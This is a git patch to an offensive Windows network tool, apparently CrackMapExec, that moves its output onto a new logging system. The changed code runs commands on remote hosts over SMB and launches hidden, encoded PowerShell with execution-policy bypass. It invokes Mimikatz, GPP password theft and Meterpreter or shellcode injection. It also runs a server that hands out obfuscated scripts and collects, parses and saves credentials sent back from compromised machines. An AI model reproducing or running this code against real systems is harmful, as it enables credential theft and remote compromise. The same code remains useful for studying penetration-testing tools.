From 3aaa378a235dc7ffecb00e7ca1b6e0c5bde17e93 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Sun, 17 Jan 2016 00:09:45 -0700 Subject: [PATCH] - HTTP/S server now uses the new logging system --- core/greenlets.py | 72 +++++++++++++++++++++++++++++++++++----- core/powershell.py | 2 +- core/servers/mimikatz.py | 37 ++++++++++++--------- 3 files changed, 86 insertions(+), 25 deletions(-) diff --git a/core/greenlets.py b/core/greenlets.py index 09ad305e..2ef16920 100644 --- a/core/greenlets.py +++ b/core/greenlets.py @@ -231,39 +231,93 @@ def main_greenlet(host): service_control.run(host) if settings.args.command: - EXECUTOR(cme_logger, settings.args.command, host, domain, settings.args.no_output, smb, settings.args.execm) + EXECUTOR(cme_logger, + settings.args.command, + host, + domain, + settings.args.no_output, + smb, + settings.args.execm) if settings.args.pscommand: - EXECUTOR(cme_logger, ps_command(settings.args.pscommand), host, domain, settings.args.no_output, smb, settings.args.execm) + EXECUTOR(cme_logger, + ps_command(settings.args.pscommand, settings.args.ps_arch), + host, + domain, + settings.args.no_output, + smb, + settings.args.execm) if settings.args.mimikatz: powah_command = PowerShell(settings.args.server, local_ip) - EXECUTOR(cme_logger, powah_command.mimikatz(), host, domain, True, smb, settings.args.execm) + EXECUTOR(cme_logger, + powah_command.mimikatz(), + host, + domain, + True, + smb, + settings.args.execm) if settings.args.gpp_passwords: powah_command = PowerShell(settings.args.server, local_ip) - EXECUTOR(cme_logger, powah_command.gpp_passwords(), host, domain, True, smb, settings.args.execm) + EXECUTOR(cme_logger, + powah_command.gpp_passwords(), + host, + domain, + True, + smb, + settings.args.execm) if settings.args.mimikatz_cmd: powah_command = PowerShell(settings.args.server, local_ip) - EXECUTOR(cme_logger, powah_command.mimikatz(settings.args.mimikatz_cmd), host, domain, True, smb, settings.args.execm) + EXECUTOR(cme_logger, + powah_command.mimikatz(settings.args.mimikatz_cmd), + host, + domain, + True, + smb, + settings.args.execm) if settings.args.powerview: #For some reason powerview functions only seem to work when using smbexec... #I think we might have a mistery on our hands boys and girls! powah_command = PowerShell(settings.args.server, local_ip) - EXECUTOR(cme_logger, powah_command.powerview(settings.args.powerview), host, domain, True, smb, 'smbexec') + EXECUTOR(cme_logger, + powah_command.powerview(settings.args.powerview), + host, + domain, + True, + smb, + 'smbexec') if settings.args.inject: powah_command = PowerShell(settings.args.server, local_ip) if settings.args.inject.startswith('met_'): - EXECUTOR(cme_logger, powah_command.inject_meterpreter(), host, domain, True, smb, settings.args.execm) + EXECUTOR(cme_logger, + powah_command.inject_meterpreter(), + host, + domain, + True, + smb, + settings.args.execm) if settings.args.inject == 'shellcode': - EXECUTOR(cme_logger, powah_command.inject_shellcode(), host, domain, True, smb, settings.args.execm) + EXECUTOR(cme_logger, + powah_command.inject_shellcode(), + host, + domain, + True, + smb, + settings.args.execm) if settings.args.inject == 'dll' or settings.args.inject == 'exe': - EXECUTOR(cme_logger, powah_command.inject_exe_dll(), host, domain, True, smb, settings.args.execm) + EXECUTOR(cme_logger, + powah_command.inject_exe_dll(), + host, + domain, + True, + smb, + settings.args.execm) try: smb.logoff() except: diff --git a/core/powershell.py b/core/powershell.py index 822493c4..f4a232d4 100644 --- a/core/powershell.py +++ b/core/powershell.py @@ -13,7 +13,7 @@ def ps_command(command, arch): logging.info('Forcing the following command to execute in a 32bit PS process: ' + command) command = '%SystemRoot%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE'))) - elif arch == 64: + elif arch == 64 or arch == 'auto': command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE'))) logging.info('Full PS command: ' + command) diff --git a/core/servers/mimikatz.py b/core/servers/mimikatz.py index fe94a9cb..95e18ccc 100644 --- a/core/servers/mimikatz.py +++ b/core/servers/mimikatz.py @@ -1,8 +1,9 @@ from BaseHTTPServer import BaseHTTPRequestHandler from threading import Thread -from core.logger import * from datetime import datetime from StringIO import StringIO +from core.logger import CMEAdapter +import logging import core.settings as settings import os import re @@ -16,13 +17,14 @@ synopsis = re.compile('<#.+#>') class MimikatzServer(BaseHTTPRequestHandler): def log_message(self, format, *args): - print_message("%s - - %s" % (self.client_address[0], format%args)) + cme_logger = logging.getLogger('CME') + cme_logger.info("%s - - %s" % (self.client_address[0], format%args)) - def save_mimikatz_output(self, data): + def save_mimikatz_output(self, data, cme_logger): log_name = 'Mimikatz-{}-{}.log'.format(self.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) with open('logs/' + log_name, 'w') as creds: creds.write(data) - print_status("{} Saved POST data to {}".format(self.client_address[0], yellow(log_name))) + cme_logger.info("Saved Mimikatz's output to {}".format(log_name)) def do_GET(self): if self.path[1:].endswith('.ps1') and self.path[1:] in os.listdir('hosted'): @@ -33,7 +35,7 @@ class MimikatzServer(BaseHTTPRequestHandler): if self.path[1:] != 'powerview.ps1': logging.info('Obfuscating Powershell script') ps_script = eval(synopsis.sub('', repr(ps_script))) #Removes the synopsys - ps_script = func_name.sub(settings.args.obfs_func_name, ps_script) #Randomizes the function name + ps_script = func_name.sub(settings.obfs_func_name, ps_script) #Randomizes the function name ps_script = comments.sub('', ps_script) #Removes the comments #logging.info('Sending the following modified powershell script: {}'.format(ps_script)) self.wfile.write(ps_script) @@ -55,6 +57,11 @@ class MimikatzServer(BaseHTTPRequestHandler): length = int(self.headers.getheader('content-length')) data = self.rfile.read(length) + cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0], + 'port': self.client_address[1], + 'service': 'PARSER', + 'hostname': ''}) + if settings.args.mimikatz: try: buf = StringIO(data).readlines() @@ -70,30 +77,30 @@ class MimikatzServer(BaseHTTPRequestHandler): i += 1 if plaintext_creds: - print_succ('{} Found plain text credentials (domain\\user:password):'.format(self.client_address[0])) + cme_logger.success('Found plain text credentials (domain\\user:password)') for cred in plaintext_creds: - print_att(u'{}'.format(cred)) + cme_logger.results(u'{}'.format(cred)) except Exception as e: - print_error("Error while parsing Mimikatz output: {}".format(e)) + cme_logger.error("Error while parsing Mimikatz output: {}".format(e)) - self.save_mimikatz_output(data) + self.save_mimikatz_output(data, cme_logger) elif settings.args.mimikatz_cmd: - print_succ('{} Mimikatz command output:'.format(self.client_address[0])) - print_att(data) + cme_logger.success('Got Mimikatz command output') + cme_logger.results(data) self.save_mimikatz_output(data) elif settings.args.powerview and data: - print_succ('{} PowerView command output:'.format(self.client_address[0])) + cme_logger.success('Got PowerView command output') buf = StringIO(data.strip()).readlines() for line in buf: - print_att(line.strip()) + cme_logger.results(line.strip()) elif settings.args.gpp_passwords and data: - print_succ('{} Get-GPPPasswords output:'.format(self.client_address[0])) + cme_logger.success('Got Get-GPPPasswords output') buf = StringIO(data.strip()).readlines() for line in buf: - print_att(line.strip()) + cme_logger.results(line.strip()) def http_server(port): http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)